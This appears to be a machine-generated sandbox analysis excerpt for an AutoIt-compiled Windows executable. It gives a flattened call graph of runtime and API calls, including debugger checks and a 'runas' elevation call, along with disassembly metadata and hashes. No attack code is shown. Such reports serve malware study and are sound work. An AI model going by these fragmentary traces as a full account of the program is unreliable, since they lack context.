InitializeCriticalSectionAndSpinCount GetModuleHandleW 96447->96469 96449 33045b 96480 33027a 96449->96480 96451 330462 96452 330467 96451->96452 96453 330475 96451->96453 96490 330433 29 API calls __onexit 96452->96490 96486 330bcf IsProcessorFeaturePresent 96453->96486 96456 330471 96457 33047c InitializeCriticalSectionAndSpinCount GetModuleHandleW 96459 3304c3 GetModuleHandleW 96457->96459 96460 3304d8 GetProcAddress GetProcAddress GetProcAddress 96457->96460 96459->96460 96461 330564 96459->96461 96462 330506 96460->96462 96463 33053e CreateEventW 96460->96463 96464 330bcf ___scrt_fastfail 4 API calls 96461->96464 96462->96463 96468 33050e __crt_fast_encode_pointer 96462->96468 96463->96461 96463->96468 96465 33056b DeleteCriticalSection 96464->96465 96466 330580 CloseHandle 96465->96466 96467 330587 96465->96467 96466->96467 96470 3304c3 GetModuleHandleW 96469->96470 96471 3304d8 GetProcAddress GetProcAddress GetProcAddress 96469->96471 96470->96471 96472 330564 96470->96472 96473 330506 96471->96473 96474 33053e CreateEventW 96471->96474 96475 330bcf ___scrt_fastfail 4 API calls 96472->96475 96473->96474 96479 33050e __crt_fast_encode_pointer 96473->96479 96474->96472 96474->96479 96476 33056b DeleteCriticalSection 96475->96476 96477 330580 CloseHandle 96476->96477 96478 330587 96476->96478 96477->96478 96478->96449 96479->96449 96481 330289 96480->96481 96482 33028d 96480->96482 96481->96451 96483 330bcf ___scrt_fastfail 4 API calls 96482->96483 96485 33029a pre_c_initialization ___scrt_release_startup_lock 96482->96485 96484 33031e 96483->96484 96485->96451 96487 330be4 ___scrt_fastfail 96486->96487 96488 330c8f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 96487->96488 96489 330cda ___scrt_fastfail 96488->96489 96489->96457 96490->96456 96491 366553 96492 33016b 8 API calls 96491->96492 96493 36655a 96492->96493 96497 37fa10 96493->96497 96495 366566 96496 37fa10 8 API calls 96495->96496 96496->96495 96498 37fa30 96497->96498 96499 37faf9 96498->96499 96500 33019b 8 API calls 96498->96500 96499->96495 96501 37fa6c 96500->96501 96503 37fa8e 96501->96503 96505 37fb02 8 API calls 96501->96505 96503->96499 96504 31be6d 8 API calls 96503->96504 96504->96503 96505->96501 96506 348792 96511 34854e 96506->96511 96509 3487ba 96517 34857f try_get_first_available_module 96511->96517 96513 34877e 96535 342b7c 26 API calls _strftime 96513->96535 96515 3486d3 96515->96509 96523 350d24 96515->96523 96516 3486c8 96516->96515 96534 33f669 20 API calls _free 96516->96534 96517->96516 96526 33919b 96517->96526 96520 33919b 40 API calls 96521 34873b 96520->96521 96521->96516 96522 33919b 40 API calls 96521->96522 96522->96516 96539 350421 96523->96539 96525 350d3f 96525->96509 96527 33923b 96526->96527 96528 3391af 96526->96528 96538 339253 40 API calls 2 library calls 96527->96538 96532 3391d1 96528->96532 96536 33f669 20 API calls _free 96528->96536 96531 3391c6 96537 342b7c 26 API calls _strftime 96531->96537 96532->96516 96532->96520 96534->96513 96535->96515 96536->96531 96537->96532 96538->96532 96541 35042d ___scrt_is_nonwritable_in_current_image 96539->96541 96540 35043b 96597 33f669 20 API calls _free 96540->96597 96541->96540 96543 350474 96541->96543 96550 3509fb 96543->96550 96544 350440 96598 342b7c 26 API calls _strftime 96544->96598 96549 35044a __wsopen_s 96549->96525 96600 3507cf 96550->96600 96553 350a46 96618 3455b1 96553->96618 96554 350a2d 96632 33f656 20 API calls _free 96554->96632 96557 350a32 96633 33f669 20 API calls _free 96557->96633 96558 350a4b 96559 350a54 96558->96559 96560 350a6b 96558->96560 96634 33f656 20 API calls _free 96559->96634 96631 35073a CreateFileW 96560->96631 96564 350498 96599 3504c1 LeaveCriticalSection __wsopen_s 96564->96599 96565 350a59 96635 33f669 20 API calls _free 96565->96635 96566 350b21 GetFileType 96569 350b73 96566->96569 96570 350b2c GetLastError 96566->96570 96568 350af6 GetLastError 96637 33f633 20 API calls 2 library calls 96568->96637 96640 3454fa 21 API calls 3 library calls 96569->96640 96638 33f633 20 API calls 2 library calls 96570->96638 96571 350aa4 96571->96566 96571->96568 96636 35073a CreateFileW 96571->96636 96575 350b3a CloseHandle 96575->96557 96578 350b63 96575->96578 96577 350ae9 96577->96566 96577->96568 96639 33f669 20 API calls _free 96578->96639 96579 350b94 96581 350be0 96579->96581 96641 35094b 72 API calls 4 library calls 96579->96641 96586 350c0d 96581->96586 96642 3504ed 72 API calls 4 library calls 96581->96642 96582 350b68 96582->96557 96585 350c06 96585->96586 96587 350c1e 96585->96587 96643 348a3e 96586->96643 96587->96564 96589 350c9c CloseHandle 96587->96589 96658 35073a CreateFileW 96589->96658 96591 350cc7 96592 350cd1 GetLastError 96591->96592 96593 350cfd 96591->96593 96659 33f633 20 API calls 2 library calls 96592->96659 96593->96564 96595 350cdd 96660 3456c3 21 API calls 3 library calls 96595->96660 96597->96544 96598->96549 96599->96549 96601 3507f0 96600->96601 96602 35080a 96600->96602 96601->96602 96668 33f669 20 API calls _free 96601->96668 96661 35075f 96602->96661 96605 3507ff 96669 342b7c 26 API calls _strftime 96605->96669 96607 350842 96608 350871 96607->96608 96670 33f669 20 API calls _free 96607->96670 96616 3508c4 96608->96616 96672 33da9d 26 API calls 2 library calls 96608->96672 96611 3508bf 96613 35093e 96611->96613 96611->96616 96612 350866 96671 342b7c 26 API calls _strftime 96612->96671 96673 342b8c 11 API calls _abort 96613->96673 96616->96553 96616->96554 96617 35094a 96619 3455bd ___scrt_is_nonwritable_in_current_image 96618->96619 96676 3432ee EnterCriticalSection 96619->96676 96621 3455e9 96680 345390 21 API calls 3 library calls 96621->96680 96623 345634 __wsopen_s 96623->96558 96625 3455c4 96625->96621 96627 345657 EnterCriticalSection 96625->96627 96629 34560b 96625->96629 96626 3455ee 96626->96629 96681 3454d7 EnterCriticalSection 96626->96681 96628 345664 LeaveCriticalSection 96627->96628 96627->96629 96628->96625 96677 3456ba 96629->96677 96631->96571 96632->96557 96633->96564 96634->96565 96635->96557 96636->96577 96637->96557 96638->96575 96639->96582 96640->96579 96641->96581 96642->96585 96683 345754 96643->96683 96645 348a54 96696 3456c3 21 API calls 3 library calls 96645->96696 96646 348a4e 96646->96645 96647 348a86 96646->96647 96649 345754 __wsopen_s 26 API calls 96646->96649 96647->96645 96650 345754 __wsopen_s 26 API calls 96647->96650 96652 348a7d 96649->96652 96653 348a92 FindCloseChangeNotification 96650->96653 96651 348aac 96654 348ace 96651->96654 96697 33f633 20 API calls 2 library calls 96651->96697 96655 345754 __wsopen_s 26 API calls 96652->96655 96653->96645 96656 348a9e GetLastError 96653->96656 96654->96564 96655->96647 96656->96645 96658->96591 96659->96595 96660->96593 96664 350777 96661->96664 96662 350792 96662->96607 96664->96662 96674 33f669 20 API calls _free 96664->96674 96665 3507b6 96675 342b7c 26 API calls _strftime 96665->96675 96667 3507c1 96667->96607 96668->96605 96669->96602 96670->96612 96671->96608 96672->96611 96673->96617 96674->96665 96675->96667 96676->96625 96682 343336 LeaveCriticalSection 96677->96682 96679 3456c1 96679->96623 96680->96626 96681->96629 96682->96679 96684 345776 96683->96684 96685 345761 96683->96685 96689 34579b 96684->96689 96700 33f656 20 API calls _free 96684->96700 96698 33f656 20 API calls _free 96685->96698 96688 345766 96699 33f669 20 API calls _free 96688->96699 96689->96646 96690 3457a6 96701 33f669 20 API calls _free 96690->96701 96693 34576e 96693->96646 96694 3457ae 96702 342b7c 26 API calls _strftime 96694->96702 96696->96651 96697->96654 96698->96688 96699->96693 96700->96690 96701->96694 96702->96693 96703 311098 96708 315d78 96703->96708 96707 3110a7 96709 31bf07 8 API calls 96708->96709 96710 315d8f GetVersionExW 96709->96710 96711 3184b7 8 API calls 96710->96711 96712 315ddc 96711->96712 96713 3196d9 8 API calls 96712->96713 96715 315e12 96712->96715 96714 315e06 96713->96714 96717 3179ed 8 API calls 96714->96717 96716 315ecc GetCurrentProcess IsWow64Process 96715->96716 96723 3550ad 96715->96723 96718 315ee8 96716->96718 96717->96715 96719 315f00 LoadLibraryA 96718->96719 96720 3550f2 GetSystemInfo 96718->96720 96721 315f11 GetProcAddress 96719->96721 96722 315f4d GetSystemInfo 96719->96722 96721->96722 96724 315f21 GetNativeSystemInfo 96721->96724 96725 315f27 96722->96725 96724->96725 96726 31109d 96725->96726 96727 315f2b FreeLibrary 96725->96727 96728 330433 29 API calls __onexit 96726->96728 96727->96726 96728->96707 96729 31105b 96734 31522e 96729->96734 96731 31106a 96765 330433 29 API calls __onexit 96731->96765 96733 311074 96735 31523e __wsopen_s 96734->96735 96736 31bf07 8 API calls 96735->96736 96737 3152f4 96736->96737 96766 31551b 96737->96766 96739 3152fd 96773 3151bf 96739->96773 96742 3165a4 8 API calls 96743 315316 96742->96743 96779 31684e 96743->96779 96746 31bf07 8 API calls 96747 31532e 96746->96747 96748 31bceb 8 API calls 96747->96748 96749 315337 RegOpenKeyExW 96748->96749 96750 354bc0 RegQueryValueExW 96749->96750 96754 315359 96749->96754 96751 354c56 RegCloseKey 96750->96751 96752 354bdd 96750->96752 96751->96754 96758 354c68 _wcslen 96751->96758 96753 33019b 8 API calls 96752->96753 96755 354bf6 96753->96755 96754->96731 96757 3141a6 8 API calls 96755->96757 96756 31627c 8 API calls 96756->96758 96759 354c01 RegQueryValueExW 96757->96759 96758->96754 96758->96756 96763 31b25f 8 API calls 96758->96763 96764 31684e 8 API calls 96758->96764 96760 354c1e 96759->96760 96762 354c38 messages 96759->96762 96761 3184b7 8 API calls 96760->96761 96761->96762 96762->96751 96763->96758 96764->96758 96765->96733 96767 3522f0 __wsopen_s 96766->96767 96768 315528 GetModuleFileNameW 96767->96768 96769 31b25f 8 API calls 96768->96769 96770 31554e 96769->96770 96771 31557e 9 API calls 96770->96771 96772 315558 96771->96772 96772->96739 96774 3522f0 __wsopen_s 96773->96774 96775 3151cc GetFullPathNameW 96774->96775 96776 3151ee 96775->96776 96777 3184b7 8 API calls 96776->96777 96778 31520c 96777->96778 96778->96742 96780 31687e __fread_nolock 96779->96780 96781 31685d 96779->96781 96782 33016b 8 API calls 96780->96782 96783 33019b 8 API calls 96781->96783 96784 315325 96782->96784 96783->96780 96784->96746 96785 36e6dd 96786 36e68a 96785->96786 96788 37e753 SHGetFolderPathW 96786->96788 96789 3184b7 8 API calls 96788->96789 96790 37e780 96789->96790 96790->96786 96791 311044 96796 312735 96791->96796 96833 3129da 96796->96833 96800 3127ac 96801 31bf07 8 API calls 96800->96801 96802 3127b6 96801->96802 96803 31bf07 8 API calls 96802->96803 96804 3127c0 96803->96804 96805 31bf07 8 API calls 96804->96805 96806 3127ca 96805->96806 96807 31bf07 8 API calls 96806->96807 96808 312808 96807->96808 96809 31bf07 8 API calls 96808->96809 96810 3128d4 96809->96810 96843 312d5e 96810->96843 96814 312906 96815 31bf07 8 API calls 96814->96815 96873 312a33 96833->96873 96836 312a33 8 API calls 96837 312a12 96836->96837 96838 31bf07 8 API calls 96837->96838 96839 312a1e 96838->96839 96840 3184b7 8 API calls 96839->96840 96841 31276b 96840->96841 96842 313205 6 API calls 96841->96842 96842->96800 96844 31bf07 8 API calls 96843->96844 96845 312d6e 96844->96845 96846 31bf07 8 API calls 96845->96846 96847 312d76 96846->96847 96848 31bf07 8 API calls 96847->96848 96849 312d91 96848->96849 96850 33016b 8 API calls 96849->96850 96851 3128de 96850->96851 96852 31318c 96851->96852 96853 31319a 96852->96853 96854 31bf07 8 API calls 96853->96854 96855 3131a5 96854->96855 96856 31bf07 8 API calls 96855->96856 96857 3131b0 96856->96857 96858 31bf07 8 API calls 96857->96858 96859 3131bb 96858->96859 96860 31bf07 8 API calls 96859->96860 96861 3131c6 96860->96861 96862 33016b 8 API calls 96861->96862 96863 3131d8 RegisterWindowMessageW 96862->96863 96863->96814 96874 31bf07 8 API calls 96873->96874 96875 312a3e 96874->96875 96876 31bf07 8 API calls 96875->96876 96877 312a46 96876->96877 96878 31bf07 8 API calls 96877->96878 96879 312a08 96878->96879 96879->96836 96881 33078b 96882 330797 ___scrt_is_nonwritable_in_current_image 96881->96882 96911 330241 96882->96911 96884 33079e 96885 3308f1 96884->96885 96888 3307c8 96884->96888 96886 330bcf ___scrt_fastfail 4 API calls 96885->96886 96887 3308f8 96886->96887 96945 3351e2 96887->96945 96898 330807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96888->96898 96922 34280d 96888->96922 96895 3307e7 96902 330868 96898->96902 96948 3351aa 38 API calls 3 library calls 96898->96948 96899 33086e 96934 3132a2 96899->96934 96930 330ce9 96902->96930 96905 33088a 96905->96887 96906 33088e 96905->96906 96907 330897 96906->96907 96950 335185 28 API calls _abort 96906->96950 96951 3303d0 13 API calls 2 library calls 96907->96951 96910 33089f 96910->96895 96912 33024a 96911->96912 96953 330a28 IsProcessorFeaturePresent 96912->96953 96914 330256 96954 333024 10 API calls 3 library calls 96914->96954 96916 33025b 96917 33025f 96916->96917 96955 3426a7 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96916->96955 96917->96884 96919 330268 96920 330276 96919->96920 96956 33304d 8 API calls 3 library calls 96919->96956 96920->96884 96924 342824 96922->96924 96957 330e1c 96924->96957 96925 3307e1 96925->96895 96926 3427b1 96925->96926 96927 3427e0 96926->96927 96928 330e1c CatchGuardHandler 5 API calls 96927->96928 96929 342809 96928->96929 96929->96898 96965 3326d0 96930->96965 96933 330d0f 96933->96899 96935 313309 96934->96935 96936 3132ae IsThemeActive 96934->96936 96949 330d22 GetModuleHandleW 96935->96949 96967 3352d3 96936->96967 96938 3132d9 96939 335339 26 API calls 96938->96939 96940 3132e0 96939->96940 96973 31326d SystemParametersInfoW SystemParametersInfoW 96940->96973 96942 3132e7 96974 313312 96942->96974 97843 334f5f 96945->97843 96948->96902 96949->96905 96950->96907 96951->96910 96953->96914 96954->96916 96955->96919 96956->96917 96958 330e27 IsProcessorFeaturePresent 96957->96958 96959 330e25 96957->96959 96961 330fee 96958->96961 96959->96925 96964 330fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96961->96964 96963 3310d1 96963->96925 96964->96963 96966 330cfc GetStartupInfoW 96965->96966 96966->96933 96968 3352df ___scrt_is_nonwritable_in_current_image 96967->96968 97023 3432ee EnterCriticalSection 96968->97023 96970 3352ea pre_c_initialization 97024 33532a 96970->97024 96972 33531f __wsopen_s 96972->96938 96973->96942 96975 313322 __wsopen_s 96974->96975 96976 31bf07 8 API calls 96975->96976 96977 31332e GetCurrentDirectoryW 96976->96977 97028 314f60 96977->97028 97023->96970 97027 343336 LeaveCriticalSection 97024->97027 97026 335331 97026->96972 97027->97026 97029 31bf07 8 API calls 97028->97029 97030 314f76 97029->97030 97143 3160f5 97030->97143 97032 314f94 97033 31bceb 8 API calls 97032->97033 97034 314fa8 97033->97034 97035 31be6d 8 API calls 97034->97035 97036 314fb3 97035->97036 97144 316102 __wsopen_s 97143->97144 97145 3184b7 8 API calls 97144->97145 97146 316134 97144->97146 97145->97146 97147 31627c 8 API calls 97146->97147 97154 31616a 97146->97154 97147->97146 97148 31b25f 8 API calls 97149 316261 97148->97149 97151 31684e 8 API calls 97149->97151 97150 31b25f 8 API calls 97150->97154 97152 31626d 97151->97152 97152->97032 97153 31684e 8 API calls 97153->97154 97154->97150 97154->97153 97155 316238 97154->97155 97156 31627c 8 API calls 97154->97156 97155->97148 97155->97152 97156->97154 97844 334f6b _unexpected 97843->97844 97845 334f72 97844->97845 97846 334f84 97844->97846 97882 3350b9 GetModuleHandleW 97845->97882 97867 3432ee EnterCriticalSection 97846->97867 97849 334f77 97849->97846 97883 3350fd GetModuleHandleExW 97849->97883 97850 334f8b 97854 335000 97850->97854 97864 335029 97850->97864 97868 342538 97850->97868 97858 335018 97854->97858 97863 3427b1 _abort 5 API calls 97854->97863 97856 335072 97891 3520c9 5 API calls CatchGuardHandler 97856->97891 97857 335046 97874 335078 97857->97874 97859 3427b1 _abort 5 API calls 97858->97859 97859->97864 97863->97858 97871 335069 97864->97871 97867->97850 97892 342271 97868->97892 97911 343336 LeaveCriticalSection 97871->97911 97873 335042 97873->97856 97873->97857 97912 34399c 97874->97912 97877 3350a6 97880 3350fd _abort 8 API calls 97877->97880 97878 335086 GetPEB 97878->97877 97879 335096 GetCurrentProcess TerminateProcess 97878->97879 97879->97877 97881 3350ae ExitProcess 97880->97881 97882->97849 97884 335127 GetProcAddress 97883->97884 97885 33514a 97883->97885 97886 33513c 97884->97886 97887 335150 FreeLibrary 97885->97887 97888 335159 97885->97888 97886->97885 97887->97888 97889 330e1c CatchGuardHandler 5 API calls 97888->97889 97890 334f83 97889->97890 97890->97846 97895 342220 97892->97895 97894 342295 97894->97854 97896 34222c ___scrt_is_nonwritable_in_current_image 97895->97896 97903 3432ee EnterCriticalSection 97896->97903 97898 34223a 97904 3422c1 97898->97904 97902 342258 __wsopen_s 97902->97894 97903->97898 97905 3422e1 97904->97905 97909 3422e9 97904->97909 97906 330e1c CatchGuardHandler 5 API calls 97905->97906 97907 342247 97906->97907 97910 342265 LeaveCriticalSection _abort 97907->97910 97908 342d58 _free 20 API calls 97908->97905 97909->97905 97909->97908 97910->97902 97911->97873 97913 3439b7 97912->97913 97914 3439c1 97912->97914 97916 330e1c CatchGuardHandler 5 API calls 97913->97916 97919 343367 5 API calls 2 library calls 97914->97919 97917 335082 97916->97917 97917->97877 97917->97878 97918 3439d8 97918->97913 97919->97918 97920 31f48c 97923 31ca50 97920->97923 97924 31ca6b 97923->97924 97925 361461 97924->97925 97926 3614af 97924->97926 97953 31ca90 97924->97953 97929 36146b 97925->97929 97932 361478 97925->97932 97925->97953 97964 3961ff 216 API calls 2 library calls 97926->97964 97962 396690 216 API calls 97929->97962 97949 31cd60 97932->97949 97963 396b2d 216 API calls 2 library calls 97932->97963 97935 361742 97935->97935 97939 31cd8e 97940 36168b 97966 396569 62 API calls 97940->97966 97943 31bdc1 39 API calls 97943->97953 97946 31b3fe 8 API calls 97946->97953 97947 32e781 39 API calls 97947->97953 97948 31cf30 39 API calls 97948->97953 97949->97939 97967 383ef6 62 API calls __wsopen_s 97949->97967 97950 3202f0 216 API calls 97950->97953 97951 31be6d 8 API calls 97951->97953 97953->97939 97953->97940 97953->97943 97953->97946 97953->97947 97953->97948 97953->97949 97953->97950 97953->97951 97954 32e73b 39 API calls 97953->97954 97955 32aa19 216 API calls 97953->97955 97956 3305d2 5 API calls __Init_thread_wait 97953->97956 97957 32bbd2 8 API calls 97953->97957 97958 330433 29 API calls __onexit 97953->97958 97959 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97953->97959 97960 32f4ed 62 API calls 97953->97960 97961 32f354 216 API calls 97953->97961 97965 36ff4f 8 API calls 97953->97965 97954->97953 97955->97953 97956->97953 97957->97953 97958->97953 97959->97953 97960->97953 97961->97953 97962->97932 97963->97949 97964->97953 97965->97953 97966->97949 97967->97935 97968 33f08e 97969 33f09a ___scrt_is_nonwritable_in_current_image 97968->97969 97970 33f0a6 97969->97970 97971 33f0bb 97969->97971 97987 33f669 20 API calls _free 97970->97987 97981 33951d EnterCriticalSection 97971->97981 97974 33f0ab 97988 342b7c 26 API calls _strftime 97974->97988 97975 33f0c7 97982 33f0fb 97975->97982 97980 33f0b6 __wsopen_s 97981->97975 97990 33f126 97982->97990 97984 33f108 97985 33f0d4 97984->97985 98010 33f669 20 API calls _free 97984->98010 97989 33f0f1 LeaveCriticalSection __fread_nolock 97985->97989 97987->97974 97988->97980 97989->97980 97991 33f134 97990->97991 97992 33f14e 97990->97992 98014 33f669 20 API calls _free 97991->98014 97994 33dce5 __fread_nolock 26 API calls 97992->97994 97996 33f157 97994->97996 97995 33f139 98015 342b7c 26 API calls _strftime 97995->98015 98011 349799 97996->98011 98000 33f25b 98002 33f268 98000->98002 98009 33f20e 98000->98009 98001 33f1df 98003 33f1fc 98001->98003 98001->98009 98017 33f669 20 API calls _free 98002->98017 98016 33f43f 31 API calls 4 library calls 98003->98016 98006 33f206 98007 33f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 98006->98007 98007->97984 98009->98007 98018 33f2bb 30 API calls 2 library calls 98009->98018 98010->97985 98019 349616 98011->98019 98013 33f173 98013->98000 98013->98001 98013->98007 98014->97995 98015->98007 98016->98006 98017->98007 98018->98007 98020 349622 ___scrt_is_nonwritable_in_current_image 98019->98020 98021 34962a 98020->98021 98026 349642 98020->98026 98054 33f656 20 API calls _free 98021->98054 98023 3496f6 98059 33f656 20 API calls _free 98023->98059 98024 34962f 98055 33f669 20 API calls _free 98024->98055 98026->98023 98029 34967a 98026->98029 98028 3496fb 98060 33f669 20 API calls _free 98028->98060 98044 3454d7 EnterCriticalSection 98029->98044 98032 349703 98061 342b7c 26 API calls _strftime 98032->98061 98033 349680 98035 3496a4 98033->98035 98036 3496b9 98033->98036 98056 33f669 20 API calls _free 98035->98056 98045 34971b 98036->98045 98038 349637 __wsopen_s 98038->98013 98040 3496a9 98057 33f656 20 API calls _free 98040->98057 98041 3496b4 98058 3496ee LeaveCriticalSection __wsopen_s 98041->98058 98044->98033 98046 345754 __wsopen_s 26 API calls 98045->98046 98047 34972d 98046->98047 98048 349735 98047->98048 98049 349746 SetFilePointerEx 98047->98049 98062 33f669 20 API calls _free 98048->98062 98051 34973a 98049->98051 98052 34975e GetLastError 98049->98052 98051->98041 98063 33f633 20 API calls 2 library calls 98052->98063 98054->98024 98055->98038 98056->98040 98057->98041 98058->98038 98059->98028 98060->98032 98061->98038 98062->98051 98063->98051 98064 32230c 98073 322315 __fread_nolock 98064->98073 98065 318e70 56 API calls 98065->98073 98066 367487 98076 31662b 8 API calls __fread_nolock 98066->98076 98068 367493 98072 31be6d 8 API calls 98068->98072 98074 321fa7 __fread_nolock 98068->98074 98069 322366 98071 317cb3 8 API calls 98069->98071 98070 33016b 8 API calls 98070->98073 98071->98074 98072->98074 98073->98065 98073->98066 98073->98069 98073->98070 98073->98074 98075 33019b 8 API calls 98073->98075 98075->98073 98076->98068

                                                    Executed Functions

                                                    Function 00315D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 542 315d78-315de7 call 31bf07 GetVersionExW call 3184b7 547 354f0c-354f1f 542->547 548 315ded 542->548 550 354f20-354f24 547->550 549 315def-315df1 548->549 553 315df7-315e56 call 3196d9 call 3179ed 549->553 554 354f4b 549->554 551 354f27-354f33 550->551 552 354f26 550->552 551->550 555 354f35-354f37 551->555 552->551 567 3550ad-3550b4 553->567 568 315e5c-315e5e 553->568 558 354f52-354f5e 554->558 555->549 557 354f3d-354f44 555->557 557->547 560 354f46 557->560 561 315ecc-315ee6 GetCurrentProcess IsWow64Process 558->561 560->554 563 315f45-315f4b 561->563 564 315ee8 561->564 566 315eee-315efa 563->566 564->566 569 315f00-315f0f LoadLibraryA 566->569 570 3550f2-3550f6 GetSystemInfo 566->570 573 3550d4-3550d7 567->573 574 3550b6 567->574 571 315e64-315e67 568->571 572 354fae-354fc1 568->572 578 315f11-315f1f GetProcAddress 569->578 579 315f4d-315f57 GetSystemInfo 569->579 571->561 580 315e69-315eab 571->580 581 354fc3-354fcc 572->581 582 354fea-354fec 572->582 576 3550c2-3550ca 573->576 577 3550d9-3550e8 573->577 575 3550bc 574->575 575->576 576->573 577->575 588 3550ea-3550f0 577->588 578->579 589 315f21-315f25 GetNativeSystemInfo 578->589 590 315f27-315f29 579->590 580->561 583 315ead-315eb0 580->583 584 354fce-354fd4 581->584 585 354fd9-354fe5 581->585 586 355021-355024 582->586 587 354fee-355003 582->587 591 354f63-354f6d 583->591 592 315eb6-315ec0 583->592 584->561 585->561 595 355026-355041 586->595 596 35505f-355062 586->596 593 355005-35500b 587->593 594 355010-35501c 587->594 588->576 589->590 597 315f32-315f44 590->597 598 315f2b-315f2c FreeLibrary 590->598 602 354f80-354f8a 591->602 603 354f6f-354f7b 591->603 592->558 599 315ec6 592->599 593->561 594->561 600 355043-355049 595->600 601 35504e-35505a 595->601 596->561 604 355068-35508f 596->604 598->597 599->561 600->561 601->561 605 354f9d-354fa9 602->605 606 354f8c-354f98 602->606 603->561 607 355091-355097 604->607 608 35509c-3550a8 604->608 605->561 606->561 607->561 608->561
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00315DA7
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    • GetCurrentProcess.KERNEL32(?,003ADC2C,00000000,?,?), ref: 00315ED3
                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00315EDA
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00315F05
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00315F17
                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00315F25
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00315F2C
                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00315F51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                    • API String ID: 3290436268-3101561225
                                                    • Opcode ID: fa4ae45d1178278b2f4929dede771f13841d190a96eb3393496c47882afc0dad
                                                    • Instruction ID: 5527b4c7c96e1b3a4b67e2ba08df771f99dadd7574245b8efd8f536e48669f1c
                                                    • Opcode Fuzzy Hash: fa4ae45d1178278b2f4929dede771f13841d190a96eb3393496c47882afc0dad
                                                    • Instruction Fuzzy Hash: 9CA1833990A6C0CFC73BC768BCC15DA7F5C6B6A301F055A99E4859B2E1C6784988CF31
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00313312 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003132EF,?), ref: 00313342
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003132EF,?), ref: 00313355
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,003E2418,003E2400,?,?,?,?,?,?,003132EF,?), ref: 003133C1
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                      • Part of subcall function 003141E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003133E9,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00314227
                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00313442
                                                    • MessageBoxA.USER32 ref: 00353C8A
                                                    • SetCurrentDirectoryW.KERNEL32(?,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00353CCB
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003D31F4,003E2418,?,?,?,?,?,?,?,003132EF), ref: 00353D54
                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00353D5B
                                                      • Part of subcall function 0031345A: GetSysColorBrush.USER32(0000000F), ref: 00313465
                                                      • Part of subcall function 0031345A: LoadCursorW.USER32(00000000,00007F00), ref: 00313474
                                                      • Part of subcall function 0031345A: LoadIconW.USER32(00000063), ref: 0031348A
                                                      • Part of subcall function 0031345A: LoadIconW.USER32(000000A4), ref: 0031349C
                                                      • Part of subcall function 0031345A: LoadIconW.USER32(000000A2), ref: 003134AE
                                                      • Part of subcall function 0031345A: LoadImageW.USER32 ref: 003134C6
                                                      • Part of subcall function 0031345A: RegisterClassExW.USER32 ref: 00313517
                                                      • Part of subcall function 0031353A: CreateWindowExW.USER32 ref: 00313568
                                                      • Part of subcall function 0031353A: CreateWindowExW.USER32 ref: 00313589
                                                      • Part of subcall function 0031353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,003132EF,?), ref: 0031359D
                                                      • Part of subcall function 0031353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,003132EF,?), ref: 003135A6
                                                      • Part of subcall function 003138F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003139C3
                                                    Strings
                                                    • runas, xrefs: 00353D4F
                                                    • 0$>, xrefs: 0031341C
                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00353C84
                                                    • AutoIt, xrefs: 00353C7F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
